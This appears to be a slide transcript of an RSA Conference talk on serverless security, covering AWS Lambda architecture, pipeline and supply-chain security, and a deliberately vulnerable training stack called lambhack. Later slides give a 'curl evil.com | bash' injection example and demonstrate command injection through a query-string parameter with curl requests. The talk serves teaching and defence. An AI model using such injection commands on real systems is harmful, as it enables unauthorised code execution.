serverless security: are you ready for the future? security: are you ready for the future? ......
Post on 17-Mar-2018
215 Views
Preview:
TRANSCRIPT
SESSION ID:SESSION ID:
#RSAC
James Wickett
Serverless Security: Are You Ready for the Future?
ASD-F01
Head of ResearchSignal Sciences@wickett
#RSAC
James Wickett
2
Head of Research at Signal Sciences
Author DevOps Fundamentals at lynda.com
Author of book on DevOps (email me for a free copy > james@signalsciences.com)
Blogger at theagileadmin.com and labs.signalsciences.com
#RSAC
Conclusion
3
Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.
New serverless patterns are just emerging
Security with serverless is easier
Security with serverless is harder
#RSAC
Conclusion (2)
4
Four key areas apply to serverless security
Software Supply Chain Security
Delivery Pipeline Security
Data Flow Security
Attack Detection
New! A very vulnerable lambda stack open source project
github.com/wickett/lambhack
#RSAC
What is Serverless?
#RSAC
Misconceptions
#RSAC
It’s Marketing
(cloud rebranded)
#RSAC
Serverless ==
no servers
#RSAC
Serverless ==
Backend as a Service
#RSAC
serverless == Platform as a
Service
#RSAC
TK: AdrianCO quote
#RSAC
So, what is Serverless?
#RSAC
http://martinfowler.com/articles/serverless.html
#RSAC
@mikebroberts
#RSAC
Serverless was first used to
describe applications that
significantly or fully depend on 3rd
party applications / services (‘in
the cloud’) to manage server-side
logic and state. http://martinfowler.com/articles/serverless.html
#RSAC
Serverless can also mean applications
where some amount of server-side logic is
still written by the application developer
but unlike traditional architectures is run
in stateless compute containers that are
event-triggered, ephemeral (may only last
for one invocation), and fully managed by
a 3rd party.
http://martinfowler.com/articles/serverless.html
#RSAC
History of Serverless
17
2012 - used to describe BaaS and Continuous Integration services run by third parties
Late 2014 - AWS launched Lambda
July 2015 - AWS launched API Gateway
October 2015 - AWS re:Invent - The Serverless company using AWS Lambda
2015 to present - Frameworks forming
2016 - Serverless Conference
http://www.slideshare.net/AmazonWebServices/arc308-
the-serverless-company-using-aws-lambda
#RSAC
18
Client
Server
Database
Proxy/LB
ServerServer
Old School Arch
#RSAC
Serverless Arch
19
Client
Auth Service API Gateway
Database
Service
Function A
Function B
Web Delivery
#RSAC
20
#RSAC
What can we say is
serverless?
#RSAC
Serverless is Functions As a
Service (FaaS)
#RSAC
Containers on Demand
#RSAC
Serverless is
(no management of)
Servers
#RSAC
Serverless IS SERVICEFULL
#RSAC
Serverless is an opinionated
framework for compute
#RSAC
Serverless encourages
functions as deploy units,
coupled with third party
services that allow running
end-to-end applications
without worrying about
system operation.
#RSAC
A Short History of Cloud
28
#RSAC
Virtualization
#RSAC
“The Cloud”
#RSAC
DEVOPS
#RSAC
SaaS
PaaS
IaaS
#RSAC
Private Cloud
#RSAC
Then, along came containers
#RSAC
containers are teh hawtness
#RSAC
\
#RSAC
Lots of effort in Container
Orchestration
#RSAC
The Cloud was to
Virtualization as Serverless
will be to Containers
#RSAC
If you want to lead your company
bravely into the new world, you
would do well to focus lot on
how serverless will evolve.
- @Cloudopinionhttps://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d
#RSAC
Serverless encourages
functions as deploy units,
coupled with third party
services that allow running
end-to-end applications
without worrying about
system operation.
#RSAC
So, what are the upsides?
#RSAC
Scaling built in
#RSAC
Pay for what you use in
100MS increments
#RSAC
With Serverless system
administration is (mostly)
lower
#RSAC
Serverless is implicit
Microservices
#RSAC
Short Circuits Ops and
moves infrastructure
runtime closer to devs
#RSAC
You can skip Chefing
Dockering all the things!
#RSAC
Lean Startup Friendly
#RSAC
Increased Velocity
#RSAC
Great, what’s the catch?
#RSAC
Ops Burden to rationalize Serverless
model
(specifically Deploy)
#RSAC
Monitoring
#RSAC
Logging
#RSAC
Stateless for Real
with no persistence* across
function runs
#RSAC
Vendor Lock-In
#RSAC
Security
#RSAC
Reliability
#RSAC
#RSAC
Serverless Use cases
#RSAC
Image resizing
#RSAC
Queue processing
61
http://martinfowler.com/articles/serverless.html
#RSAC
Run a web application
#RSAC
API Gateway
63
http://martinfowler.com/articles/serverless.html
#RSAC
CI/CD
#RSAC
Security is the same and
different
#RSAC
What used to be system
calls is now distributed
computing over the network
#RSAC
Serverless shifts attack
surface to third parties
#RSAC
Lets try a sample application
in AWS
#RSAC
Go Sparta
69
Golang!
AWS Lambda supports bring your own binary
Sparta wraps your binary with node.js shim
#RSAC
#RSAC
Other options
71
Serverless Framework
APEX
Kappa
#RSAC
Wordy
72
Analyzes textual occurrences given a block of text, returns JSON count of words
Calls API under the hood to get text
It is comprised of Lambda, s3, API Gateway
#RSAC
#RSAC
#RSAC
#RSAC
go run main.go provision -s S3_BUCKET
#RSAC
#RSAC
#RSAC
#RSAC
#RSAC
#RSAC
#RSAC
#RSAC
#RSAC
#RSAC
What I learned about
serverless security
#RSAC
#RSAC
Security
#RSAC
Four areas of Serverless Security
89
Secure Software Supply Chain
Delivery Pipeline
Data Flow Security
Attack Detection
#RSAC
Secure Software Supply
Chain
#RSAC
Surface area Reduction!
#RSAC
Surface area Expansion!
#RSAC
SSL / TLS from the Provider
#RSAC
New Way
Old Way
#RSAC
Routing from the provider
#RSAC
Old Way
New Way
#RSAC
#RSAC
Lambda + s3 + kinesis + DynamoDB +
cloudformation + API Gateway + Auth0
#RSAC
Abuse of open IAM privs
99
https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
#RSAC
Recommendation:
Use a third-party service to
monitor for provider config
changes
#RSAC
Provider Security
101
Disable root access keys
Manage users with profiles
Secure your keys in your deploy system
Secure keys in dev system
Use provider MFA
#RSAC
Delivery Pipeline Security
#RSAC
#RSAC
Unit Testing
#RSAC
Easier to mock
Harder to mock
#RSAC
#RSAC
Integration Testing
#RSAC
Configuration is part of
delivery
#RSAC
#RSAC
Simple Deploy Pipeline Security
110
Only dev keys can push to ‘dev’
Only build/deploy system can push to pre-prod
Integration tests must pass in this env
Security validation must take place
Allow push to prod, only by deploy system
#RSAC
Security Integration Testing
111
BDD-Security - github.com/continuumsecurity/bdd-security
Gauntlt - gauntlt.org
#RSAC
http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015
#RSAC
Data Flow Security
113
Development
Data Flow Diagrams
Threat modeling
Runtime
#RSAC
Your provider is responsible for the
underlying infrastructure and
services. You are responsible for
ensuring you use the services in a
secure manner.
https://read.acloud.guru/adopting-serverless-architectures-and-security-254a0c12b54a
#RSAC
Application layer DoS
#RSAC
Timeouts and Execution
restrictions
#RSAC
Attack Detection
#RSAC
https://medium.com/@PaulDJohnston/security-and-serverless-ec52817385c4
#RSAC
AppSec Greatest Hits (XSS,
SQLi, Cmdexe) still relevant
15 years later!
#RSAC
AppSec Problems
120
#RSAC
Types of Attacks
121
XSS, Injection, Deserialization, …
New surface area similar problems
e.g. appending to ‘curl evil.com | bash’ or <script>alert(1)</script> to a filename you upload on s3
#RSAC
Defense
122
Logging, emitting events
Vandium (SQLi) wrapper
Content Security Policy (CSP)
More things need to be done here…
#RSAC
New Thing Alert!
123
Want to see make the point that appsec is still relevant in serverless
A vulnerable Lambda + API Gateway stack (born from the heritage of WebGoat, Rails Goat and Gruyere, …)
Introducing lambhack
#RSAC
#RSAC
lambhack
125
A Vulnerable Lambda + API Gateway stack
Open Source, MIT licensed
Released for the first time here at RSA
Includes arbitrary code execution in a query string
More work needed, PRs accepted and looking for community help
github.com/wickett/lambhack
#RSAC
//command := lambdaEvent.PathParams["command"]
command := lambdaEvent.QueryParams["args"]
output := runner.Run(command)
Vulnerable code is also
vulnerable in Serverless
#RSAC
Let’s take a look at
cmdexe in lambhack
#RSAC
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args
=uname+-a;+sleep+1"
> Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016
x86_64 x86_64 x86_64 GNU/Linux
uname -a
#RSAC
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=
cat+/proc/version;+sleep+1"
> Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version
4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016
cat /proc/version
#RSAC
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/
c?args=ls+-la+/tmp;+sleep+1"
total
17916
drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 .
drwxr-xr-x 21 root root 4096 Feb 8 21:47 ..
-rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64
Let’s see /tmp
#RSAC
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/
c?args=ls+/tmp;+sleep+1"
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/pargs=touch+/tmp/
wickettfile;+sleep+1"
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/
args=ls+/tmp;+sleep+1"
> Sparta.lambda.amd64
wickettfile
Lambda Reuse!
#RSAC
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/
c?args=which+curl;+sleep+1"
> /usr/bin/curl
Could we upload our own
payload?
#RSAC
XSS, SQLi, … More to come!
#RSAC
Conclusion
135
Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.
New serverless patterns are just emerging
Security with serverless is easier
Security with serverless is harder
#RSAC
Conclusion (2)
136
Four key areas apply to serverless security
Software Supply Chain Security
Delivery Pipeline Security
Data Flow Security
Attack Detection
New! A very vulnerable lambda stack open source project
github.com/wickett/lambhack
#RSAC
#RSAC
Let’s talk!
138
James Wickett
james@signalsciences.com
@wickett
top related